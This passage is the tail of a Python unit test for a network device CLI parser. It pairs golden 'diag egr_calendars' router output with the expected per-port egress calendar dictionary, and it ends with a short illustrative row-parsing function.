'e2e_if_rate': 10500096,
'e2e_port_rate': 10500096,
'egq_if': 69,
'egq_if_rate': 433417500,
'egq_port_rate': 10100011,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
54: {
'e2e_if': 69,
'e2e_if_rate': 10500096,
'e2e_port_rate': 10500096,
'egq_if': 67,
'egq_if_rate': 433417500,
'egq_port_rate': 10100011,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
55: {
'e2e_if': 70,
'e2e_if_rate': 10500096,
'e2e_port_rate': 10500096,
'egq_if': 68,
'egq_if_rate': 433417500,
'egq_port_rate': 10100011,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
56: {
'e2e_if': 68,
'e2e_if_rate': 10500096,
'e2e_port_rate': 10500096,
'egq_if': 66,
'egq_if_rate': 433417500,
'egq_port_rate': 10100011,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
57: {
'e2e_if': 76,
'e2e_if_rate': 10500096,
'e2e_port_rate': 10500096,
'egq_if': 74,
'egq_if_rate': 433417500,
'egq_port_rate': 10100011,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
58: {
'e2e_if': 56,
'e2e_if_rate': 10500096,
'e2e_port_rate': 10500096,
'egq_if': 54,
'egq_if_rate': 433417500,
'egq_port_rate': 10100011,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
59: {
'e2e_if': 74,
'e2e_if_rate': 10500096,
'e2e_port_rate': 10500096,
'egq_if': 72,
'egq_if_rate': 433417500,
'egq_port_rate': 10100011,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
60: {
'e2e_if': 77,
'e2e_if_rate': 10500096,
'e2e_port_rate': 10500096,
'egq_if': 75,
'egq_if_rate': 433417500,
'egq_port_rate': 10100011,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
61: {
'e2e_if': 54,
'e2e_if_rate': 10500096,
'e2e_port_rate': 10500096,
'egq_if': 52,
'egq_if_rate': 433417500,
'egq_port_rate': 10100011,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
62: {
'e2e_if': 64,
'e2e_if_rate': 10500096,
'e2e_port_rate': 10500096,
'egq_if': 62,
'egq_if_rate': 433417500,
'egq_port_rate': 10100011,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
63: {
'e2e_if': 66,
'e2e_if_rate': 10500096,
'e2e_port_rate': 10500096,
'egq_if': 64,
'egq_if_rate': 433417500,
'egq_port_rate': 10100011,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
64: {
'e2e_if': 67,
'e2e_if_rate': 10500096,
'e2e_port_rate': 10500096,
'egq_if': 65,
'egq_if_rate': 433417500,
'egq_port_rate': 10100011,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
65: {
'e2e_if': 62,
'e2e_if_rate': 10500096,
'e2e_port_rate': 10500096,
'egq_if': 60,
'egq_if_rate': 433417500,
'egq_port_rate': 10100011,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
66: {
'e2e_if': 61,
'e2e_if_rate': 10500096,
'e2e_port_rate': 10500096,
'egq_if': 59,
'egq_if_rate': 433417500,
'egq_port_rate': 10100011,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
67: {
'e2e_if': 63,
'e2e_if_rate': 10500096,
'e2e_port_rate': 10500096,
'egq_if': 61,
'egq_if_rate': 433417500,
'egq_port_rate': 10100011,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
68: {
'e2e_if': 65,
'e2e_if_rate': 10500096,
'e2e_port_rate': 10500096,
'egq_if': 63,
'egq_if_rate': 433417500,
'egq_port_rate': 10100011,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
69: {
'e2e_if': 57,
'e2e_if_rate': 10500096,
'e2e_port_rate': 10500096,
'egq_if': 55,
'egq_if_rate': 433417500,
'egq_port_rate': 10100011,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
70: {
'e2e_if': 60,
'e2e_if_rate': 10500096,
'e2e_port_rate': 10500096,
'egq_if': 58,
'egq_if_rate': 433417500,
'egq_port_rate': 10100011,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
71: {
'e2e_if': 59,
'e2e_if_rate': 10500096,
'e2e_port_rate': 10500096,
'egq_if': 57,
'egq_if_rate': 433417500,
'egq_port_rate': 10100011,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
72: {
'e2e_if': 58,
'e2e_if_rate': 10500096,
'e2e_port_rate': 10500096,
'egq_if': 56,
'egq_if_rate': 433417500,
'egq_port_rate': 10100011,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
128: {
'e2e_if': 5,
'e2e_if_rate': 161280000,
'e2e_port_rate': 5184078,
'egq_if': 31,
'egq_if_rate': 159997500,
'egq_port_rate': 1010113,
'high_calendar': 255,
'low_calendar': 5,
'priority': 'LOW',
},
129: {
'e2e_if': 4,
'e2e_if_rate': 339536840,
'e2e_port_rate': 5180956,
'egq_if': 31,
'egq_if_rate': 323190000,
'egq_port_rate': 1010033,
'high_calendar': 255,
'low_calendar': 4,
'priority': 'LOW',
},
130: {
'e2e_if': 5,
'e2e_if_rate': 161280000,
'e2e_port_rate': 5184078,
'egq_if': 31,
'egq_if_rate': 159997500,
'egq_port_rate': 1010113,
'high_calendar': 255,
'low_calendar': 5,
'priority': 'LOW',
},
131: {
'e2e_if': 4,
'e2e_if_rate': 339536840,
'e2e_port_rate': 5180956,
'egq_if': 31,
'egq_if_rate': 323190000,
'egq_port_rate': 1010033,
'high_calendar': 255,
'low_calendar': 4,
'priority': 'LOW',
},
132: {
'e2e_if': 5,
'e2e_if_rate': 161280000,
'e2e_port_rate': 165890478,
'egq_if': 31,
'egq_if_rate': 159997500,
'egq_port_rate': 161600009,
'high_calendar': 255,
'low_calendar': 5,
'priority': 'LOW',
},
133: {
'e2e_if': 4,
'e2e_if_rate': 339536840,
'e2e_port_rate': 165790561,
'egq_if': 31,
'egq_if_rate': 323190000,
'egq_port_rate': 161600021,
'high_calendar': 255,
'low_calendar': 4,
'priority': 'LOW',
},
134: {
'e2e_if': 5,
'e2e_if_rate': 161280000,
'e2e_port_rate': 5184078,
'egq_if': 31,
'egq_if_rate': 159997500,
'egq_port_rate': 1010113,
'high_calendar': 255,
'low_calendar': 5,
'priority': 'LOW',
},
135: {
'e2e_if': 4,
'e2e_if_rate': 339536840,
'e2e_port_rate': 5180956,
'egq_if': 31,
'egq_if_rate': 323190000,
'egq_port_rate': 1010033,
'high_calendar': 255,
'low_calendar': 4,
'priority': 'LOW',
},
136: {
'e2e_if': 5,
'e2e_if_rate': 161280000,
'e2e_port_rate': 165890478,
'egq_if': 31,
'egq_if_rate': 159997500,
'egq_port_rate': 161600009,
'high_calendar': 255,
'low_calendar': 5,
'priority': 'LOW',
},
137: {
'e2e_if': 4,
'e2e_if_rate': 339536840,
'e2e_port_rate': 165790561,
'egq_if': 31,
'egq_if_rate': 323190000,
'egq_port_rate': 161600021,
'high_calendar': 255,
'low_calendar': 4,
'priority': 'LOW',
},
138: {
'e2e_if': 5,
'e2e_if_rate': 161280000,
'e2e_port_rate': 165890478,
'egq_if': 31,
'egq_if_rate': 159997500,
'egq_port_rate': 161600009,
'high_calendar': 255,
'low_calendar': 5,
'priority': 'LOW',
},
139: {
'e2e_if': 4,
'e2e_if_rate': 339536840,
'e2e_port_rate': 165790561,
'egq_if': 31,
'egq_if_rate': 323190000,
'egq_port_rate': 161600021,
'high_calendar': 255,
'low_calendar': 4,
'priority': 'LOW',
},
140: {
'e2e_if': 5,
'e2e_if_rate': 161280000,
'e2e_port_rate': 5184078,
'egq_if': 31,
'egq_if_rate': 159997500,
'egq_port_rate': 1010113,
'high_calendar': 255,
'low_calendar': 5,
'priority': 'LOW',
},
141: {
'e2e_if': 4,
'e2e_if_rate': 339536840,
'e2e_port_rate': 5180956,
'egq_if': 31,
'egq_if_rate': 323190000,
'egq_port_rate': 1010033,
'high_calendar': 255,
'low_calendar': 4,
'priority': 'LOW',
},
142: {
'e2e_if': 5,
'e2e_if_rate': 161280000,
'e2e_port_rate': 165890478,
'egq_if': 31,
'egq_if_rate': 159997500,
'egq_port_rate': 161600009,
'high_calendar': 255,
'low_calendar': 5,
'priority': 'LOW',
},
143: {
'e2e_if': 4,
'e2e_if_rate': 339536840,
'e2e_port_rate': 165790561,
'egq_if': 31,
'egq_if_rate': 323190000,
'egq_port_rate': 161600021,
'high_calendar': 255,
'low_calendar': 4,
'priority': 'LOW',
},
144: {
'e2e_if': 5,
'e2e_if_rate': 161280000,
'e2e_port_rate': 165890478,
'egq_if': 31,
'egq_if_rate': 159997500,
'egq_port_rate': 161600009,
'high_calendar': 255,
'low_calendar': 5,
'priority': 'LOW',
},
145: {
'e2e_if': 4,
'e2e_if_rate': 339536840,
'e2e_port_rate': 165790561,
'egq_if': 31,
'egq_if_rate': 323190000,
'egq_port_rate': 161600021,
'high_calendar': 255,
'low_calendar': 4,
'priority': 'LOW',
},
146: {
'e2e_if': 5,
'e2e_if_rate': 161280000,
'e2e_port_rate': 165890478,
'egq_if': 31,
'egq_if_rate': 159997500,
'egq_port_rate': 161600009,
'high_calendar': 255,
'low_calendar': 5,
'priority': 'LOW',
},
147: {
'e2e_if': 4,
'e2e_if_rate': 339536840,
'e2e_port_rate': 165790561,
'egq_if': 31,
'egq_if_rate': 323190000,
'egq_port_rate': 161600021,
'high_calendar': 255,
'low_calendar': 4,
'priority': 'LOW',
},
148: {
'e2e_if': 5,
'e2e_if_rate': 161280000,
'e2e_port_rate': 10368155,
'egq_if': 31,
'egq_if_rate': 159997500,
'egq_port_rate': 10100009,
'high_calendar': 255,
'low_calendar': 5,
'priority': 'LOW',
},
149: {
'e2e_if': 4,
'e2e_if_rate': 339536840,
'e2e_port_rate': 10361911,
'egq_if': 31,
'egq_if_rate': 323190000,
'egq_port_rate': 10100089,
'high_calendar': 255,
'low_calendar': 4,
'priority': 'LOW',
},
208: {
'e2e_if': 4,
'e2e_if_rate': 1050000,
'e2e_port_rate': 10500000,
'egq_if': 28,
'egq_if_rate': 990000,
'egq_port_rate': 10100000,
'high_calendar': 255,
'low_calendar': 4,
'priority': 'LOW',
},
232: {
'e2e_if': 32,
'e2e_if_rate': 31500416,
'e2e_port_rate': 31500416,
'egq_if': 30,
'egq_if_rate': 433417500,
'egq_port_rate': 30300003,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
233: {
'e2e_if': 32,
'e2e_if_rate': 1050112,
'e2e_port_rate': 1050112,
'egq_if': 30,
'egq_if_rate': 609052500,
'egq_port_rate': 1010011,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
235: {
'e2e_if': 5,
'e2e_if_rate': 161280000,
'e2e_port_rate': 20736310,
'egq_if': 31,
'egq_if_rate': 159997500,
'egq_port_rate': 20200017,
'high_calendar': 255,
'low_calendar': 5,
'priority': 'LOW',
},
240: {
'e2e_if': 33,
'e2e_if_rate': 105004160,
'e2e_port_rate': 105004160,
'egq_if': 29,
'egq_if_rate': 433417500,
'egq_port_rate': 101000003,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
241: {
'e2e_if': 33,
'e2e_if_rate': 1050112,
'e2e_port_rate': 1050112,
'egq_if': 29,
'egq_if_rate': 609052500,
'egq_port_rate': 1010011,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
246: {
'e2e_if': 5,
'e2e_if_rate': 161280000,
'e2e_port_rate': 25920388,
'egq_if': 31,
'egq_if_rate': 159997500,
'egq_port_rate': 25250083,
'high_calendar': 255,
'low_calendar': 5,
'priority': 'LOW',
},
247: {
'e2e_if': 4,
'e2e_if_rate': 339536840,
'e2e_port_rate': 25904776,
'egq_if': 31,
'egq_if_rate': 323190000,
'egq_port_rate': 25250105,
'high_calendar': 255,
'low_calendar': 4,
'priority': 'LOW',
},
248: {
'e2e_if': 5,
'e2e_if_rate': 161280000,
'e2e_port_rate': 10368155,
'egq_if': 31,
'egq_if_rate': 159997500,
'egq_port_rate': 10100009,
'high_calendar': 255,
'low_calendar': 5,
'priority': 'LOW',
},
249: {
'e2e_if': 4,
'e2e_if_rate': 339536840,
'e2e_port_rate': 10361911,
'egq_if': 31,
'egq_if_rate': 323190000,
'egq_port_rate': 10100089,
'high_calendar': 255,
'low_calendar': 4,
'priority': 'LOW',
},
250: {
'e2e_if': 5,
'e2e_if_rate': 161280000,
'e2e_port_rate': 165890478,
'egq_if': 31,
'egq_if_rate': 159997500,
'egq_port_rate': 161600009,
'high_calendar': 255,
'low_calendar': 5,
'priority': 'LOW',
},
251: {
'e2e_if': 4,
'e2e_if_rate': 339536840,
'e2e_port_rate': 165790561,
'egq_if': 31,
'egq_if_rate': 323190000,
'egq_port_rate': 161600021,
'high_calendar': 255,
'low_calendar': 4,
'priority': 'LOW',
},
252: {
'e2e_if': 5,
'e2e_if_rate': 161280000,
'e2e_port_rate': 10368155,
'egq_if': 31,
'egq_if_rate': 159997500,
'egq_port_rate': 1120,
'high_calendar': 255,
'low_calendar': 5,
'priority': 'LOW',
},
253: {
'e2e_if': 4,
'e2e_if_rate': 1050000,
'e2e_port_rate': 350000,
'egq_if': 28,
'egq_if_rate': 990000,
'egq_port_rate': 101000000,
'high_calendar': 255,
'low_calendar': 4,
'priority': 'LOW',
},
},
},
},
}
golden_output1 = {'execute.return_value': '''
show controllers fia diagshell 0 "diag egr_calendars" location all
Mon Mar 23 13:12:43.297 UTC
Node ID: 0/0/CPU0
Port | Priority | High Calendar | Low Calendar | EGQ IF | E2E IF | EGQ Port Rate | EGQ IF Rate | E2E Port Rate | E2E IF Rate
----------------------------------------------------------------------------------------------------------------------------
0 | LOW | 255 | 4 | 28 | 4 | 336671 | 990000 | 350000 | 1050000
1 | LOW | 32 | 32 | 1 | 36 | 101000014 | 609052500 | 105004160 | 105004160
5 | LOW | 32 | 32 | 2 | 37 | 101000014 | 609052500 | 105004160 | 105004160
9 | LOW | 32 | 32 | 3 | 38 | 101000014 | 609052500 | 105004160 | 105004160
13 | LOW | 32 | 32 | 0 | 35 | 101000014 | 609052500 | 105004160 | 105004160
17 | LOW | 32 | 32 | 4 | 39 | 101000014 | 609052500 | 105004160 | 105004160
21 | LOW | 32 | 32 | 5 | 40 | 101000014 | 609052500 | 105004160 | 105004160
25 | LOW | 32 | 32 | 48 | 50 | 10100011 | 433417500 | 10500096 | 10500096
26 | LOW | 32 | 32 | 36 | 38 | 1010003 | 433417500 | 1050112 | 1050112
27 | LOW | 32 | 32 | 34 | 36 | 1010003 | 433417500 | 1050112 | 1050112
28 | LOW | 32 | 32 | 49 | 51 | 10100011 | 433417500 | 10500096 | 10500096
29 | LOW | 32 | 32 | 35 | 37 | 1010003 | 433417500 | 1050112 | 1050112
30 | LOW | 32 | 32 | 76 | 78 | 10100011 | 433417500 | 10500096 | 10500096
31 | LOW | 32 | 32 | 39 | 41 | 10100011 | 433417500 | 10500096 | 10500096
32 | LOW | 32 | 32 | 78 | 80 | 10100011 | 433417500 | 10500096 | 10500096
33 | LOW | 32 | 32 | 33 | 35 | 1010003 | 433417500 | 1050112 | 1050112
34 | LOW | 32 | 32 | 38 | 40 | 1010003 | 433417500 | 1050112 | 1050112
35 | LOW | 32 | 32 | 37 | 39 | 1010003 | 433417500 | 1050112 | 1050112
36 | LOW | 32 | 32 | 47 | 49 | 10100011 | 433417500 | 10500096 | 10500096
37 | LOW | 32 | 32 | 51 | 53 | 10100011 | 433417500 | 10500096 | 10500096
38 | LOW | 32 | 32 | 40 | 42 | 10100011 | 433417500 | 10500096 | 10500096
39 | LOW | 32 | 32 | 79 | 81 | 10100011 | 433417500 | 10500096 | 10500096
40 | LOW | 32 | 32 | 77 | 79 | 10100011 | 433417500 | 10500096 | 10500096
41 | LOW | 32 | 32 | 41 | 43 | 10100011 | 433417500 | 10500096 | 10500096
42 | LOW | 32 | 32 | 50 | 52 | 10100011 | 433417500 | 10500096 | 10500096
43 | LOW | 32 | 32 | 42 | 44 | 10100011 | 433417500 | 10500096 | 10500096
44 | LOW | 32 | 32 | 80 | 82 | 10100011 | 433417500 | 10500096 | 10500096
45 | LOW | 32 | 32 | 43 | 45 | 10100011 | 433417500 | 10500096 | 10500096
46 | LOW | 32 | 32 | 44 | 46 | 10100011 | 433417500 | 10500096 | 10500096
47 | LOW | 32 | 32 | 45 | 47 | 10100011 | 433417500 | 10500096 | 10500096
48 | LOW | 32 | 32 | 46 | 48 | 10100011 | 433417500 | 10500096 | 10500096
49 | LOW | 32 | 32 | 53 | 55 | 10100011 | 433417500 | 10500096 | 10500096
50 | LOW | 32 | 32 | 73 | 75 | 10100011 | 433417500 | 10500096 | 10500096
51 | LOW | 32 | 32 | 71 | 73 | 10100011 | 433417500 | 10500096 | 10500096
52 | LOW | 32 | 32 | 70 | 72 | 10100011 | 433417500 | 10500096 | 10500096
53 | LOW | 32 | 32 | 69 | 71 | 10100011 | 433417500 | 10500096 | 10500096
54 | LOW | 32 | 32 | 67 | 69 | 10100011 | 433417500 | 10500096 | 10500096
55 | LOW | 32 | 32 | 68 | 70 | 10100011 | 433417500 | 10500096 | 10500096
56 | LOW | 32 | 32 | 66 | 68 | 10100011 | 433417500 | 10500096 | 10500096
57 | LOW | 32 | 32 | 74 | 76 | 10100011 | 433417500 | 10500096 | 10500096
58 | LOW | 32 | 32 | 54 | 56 | 10100011 | 433417500 | 10500096 | 10500096
59 | LOW | 32 | 32 | 72 | 74 | 10100011 | 433417500 | 10500096 | 10500096
60 | LOW | 32 | 32 | 75 | 77 | 10100011 | 433417500 | 10500096 | 10500096
61 | LOW | 32 | 32 | 52 | 54 | 10100011 | 433417500 | 10500096 | 10500096
62 | LOW | 32 | 32 | 62 | 64 | 10100011 | 433417500 | 10500096 | 10500096
63 | LOW | 32 | 32 | 64 | 66 | 10100011 | 433417500 | 10500096 | 10500096
64 | LOW | 32 | 32 | 65 | 67 | 10100011 | 433417500 | 10500096 | 10500096
65 | LOW | 32 | 32 | 60 | 62 | 10100011 | 433417500 | 10500096 | 10500096
66 | LOW | 32 | 32 | 59 | 61 | 10100011 | 433417500 | 10500096 | 10500096
67 | LOW | 32 | 32 | 61 | 63 | 10100011 | 433417500 | 10500096 | 10500096
68 | LOW | 32 | 32 | 63 | 65 | 10100011 | 433417500 | 10500096 | 10500096
69 | LOW | 32 | 32 | 55 | 57 | 10100011 | 433417500 | 10500096 | 10500096
70 | LOW | 32 | 32 | 58 | 60 | 10100011 | 433417500 | 10500096 | 10500096
71 | LOW | 32 | 32 | 57 | 59 | 10100011 | 433417500 | 10500096 | 10500096
72 | LOW | 32 | 32 | 56 | 58 | 10100011 | 433417500 | 10500096 | 10500096
128 | LOW | 255 | 5 | 31 | 5 | 1010113 | 159997500 | 5184078 | 161280000
129 | LOW | 255 | 4 | 31 | 4 | 1010033 | 323190000 | 5180956 | 339536840
130 | LOW | 255 | 5 | 31 | 5 | 1010113 | 159997500 | 5184078 | 161280000
131 | LOW | 255 | 4 | 31 | 4 | 1010033 | 323190000 | 5180956 | 339536840
132 | LOW | 255 | 5 | 31 | 5 | 161600009 | 159997500 | 165890478 | 161280000
133 | LOW | 255 | 4 | 31 | 4 | 161600021 | 323190000 | 165790561 | 339536840
134 | LOW | 255 | 5 | 31 | 5 | 1010113 | 159997500 | 5184078 | 161280000
135 | LOW | 255 | 4 | 31 | 4 | 1010033 | 323190000 | 5180956 | 339536840
136 | LOW | 255 | 5 | 31 | 5 | 161600009 | 159997500 | 165890478 | 161280000
137 | LOW | 255 | 4 | 31 | 4 | 161600021 | 323190000 | 165790561 | 339536840
138 | LOW | 255 | 5 | 31 | 5 | 161600009 | 159997500 | 165890478 | 161280000
139 | LOW | 255 | 4 | 31 | 4 | 161600021 | 323190000 | 165790561 | 339536840
140 | LOW | 255 | 5 | 31 | 5 | 1010113 | 159997500 | 5184078 | 161280000
141 | LOW | 255 | 4 | 31 | 4 | 1010033 | 323190000 | 5180956 | 339536840
142 | LOW | 255 | 5 | 31 | 5 | 161600009 | 159997500 | 165890478 | 161280000
143 | LOW | 255 | 4 | 31 | 4 | 161600021 | 323190000 | 165790561 | 339536840
144 | LOW | 255 | 5 | 31 | 5 | 161600009 | 159997500 | 165890478 | 161280000
145 | LOW | 255 | 4 | 31 | 4 | 161600021 | 323190000 | 165790561 | 339536840
146 | LOW | 255 | 5 | 31 | 5 | 161600009 | 159997500 | 165890478 | 161280000
147 | LOW | 255 | 4 | 31 | 4 | 161600021 | 323190000 | 165790561 | 339536840
148 | LOW | 255 | 5 | 31 | 5 | 10100009 | 159997500 | 10368155 | 161280000
149 | LOW | 255 | 4 | 31 | 4 | 10100089 | 323190000 | 10361911 | 339536840
208 | LOW | 255 | 4 | 28 | 4 | 10100000 | 990000 | 10500000 | 1050000
232 | LOW | 32 | 32 | 30 | 32 | 30300003 | 433417500 | 31500416 | 31500416
233 | LOW | 32 | 32 | 30 | 32 | 1010011 | 609052500 | 1050112 | 1050112
235 | LOW | 255 | 5 | 31 | 5 | 20200017 | 159997500 | 20736310 | 161280000
240 | LOW | 32 | 32 | 29 | 33 | 101000003 | 433417500 | 105004160 | 105004160
241 | LOW | 32 | 32 | 29 | 33 | 1010011 | 609052500 | 1050112 | 1050112
246 | LOW | 255 | 5 | 31 | 5 | 25250083 | 159997500 | 25920388 | 161280000
247 | LOW | 255 | 4 | 31 | 4 | 25250105 | 323190000 | 25904776 | 339536840
248 | LOW | 255 | 5 | 31 | 5 | 10100009 | 159997500 | 10368155 | 161280000
249 | LOW | 255 | 4 | 31 | 4 | 10100089 | 323190000 | 10361911 | 339536840
250 | LOW | 255 | 5 | 31 | 5 | 161600009 | 159997500 | 165890478 | 161280000
251 | LOW | 255 | 4 | 31 | 4 | 161600021 | 323190000 | 165790561 | 339536840
252 | LOW | 255 | 5 | 31 | 5 | 1120 | 159997500 | 10368155 | 161280000
253 | LOW | 255 | 4 | 28 | 4 | 101000000 | 990000 | 350000 | 1050000
'''}
    def test_empty(self):
        self.device = Mock(**self.empty_output)
        obj = ShowControllersFiaDiagshellDiagEgrCalendarsLocation(device=self.device)
        with self.assertRaises(SchemaEmptyParserError):
            parsed_output = obj.parse(diagshell=0, location='all')

    def test_golden1(self):
        self.device = Mock(**self.golden_output1)
        obj = ShowControllersFiaDiagshellDiagEgrCalendarsLocation(device=self.device)
        parsed_output = obj.parse(diagshell=0, location='all')
        self.assertEqual(parsed_output, self.golden_parsed_output1)


if __name__ == '__main__':
    unittest.main()
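For reference, the mapping the parser performs is mechanical: each data row of the `diag egr_calendars` table splits on `|` into ten columns that correspond one-to-one with the schema keys in `golden_parsed_output1`. The following is a minimal standalone sketch of that row-to-dict conversion, independent of the actual `ShowControllersFiaDiagshellDiagEgrCalendarsLocation` implementation (which may use different internals); the function and key list here are illustrative, not the library's API.

```python
# Column order follows the golden output header:
# Port | Priority | High Calendar | Low Calendar | EGQ IF | E2E IF |
#   EGQ Port Rate | EGQ IF Rate | E2E Port Rate | E2E IF Rate
KEYS = ['priority', 'high_calendar', 'low_calendar', 'egq_if', 'e2e_if',
        'egq_port_rate', 'egq_if_rate', 'e2e_port_rate', 'e2e_if_rate']


def parse_calendar_row(line):
    """Illustrative: convert one data row into a (port, values) pair."""
    fields = [f.strip() for f in line.split('|')]
    # Skip header/separator lines: data rows have 10 cells and a numeric port.
    if len(fields) != 10 or not fields[0].isdigit():
        return None
    port = int(fields[0])
    values = dict(zip(KEYS, fields[1:]))
    # Every field except 'priority' is an integer in the parsed schema.
    for key in KEYS[1:]:
        values[key] = int(values[key])
    return port, values


port, row = parse_calendar_row(
    '208 | LOW | 255 | 4 | 28 | 4 | 10100000 | 990000 | 10500000 | 1050000')
```

Running this on the port-208 row from `golden_output1` reproduces the corresponding entry of `golden_parsed_output1`.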